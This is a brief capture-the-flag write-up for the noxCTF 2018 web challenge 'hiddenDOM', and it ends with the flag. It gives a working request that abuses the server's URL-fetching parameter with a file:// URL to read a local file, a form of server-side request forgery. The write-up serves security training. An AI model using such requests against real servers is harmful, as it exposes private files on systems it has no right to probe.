Rating:
# noxCTF 2018 : hiddenDOM
**category** : web
**points** : 670
**solves** : 37
## write-up
Server will get the `target` url for us
And use regex `expression` to grep the lines
This will work `http://chal.noxale.com:5588/index.php?target=file:///var/www/html/flag.txt&expression=/.*/`
`noxCTF{/[h1DD3N]*[55Rf]*[r393X]*/}`
# other write-ups and resources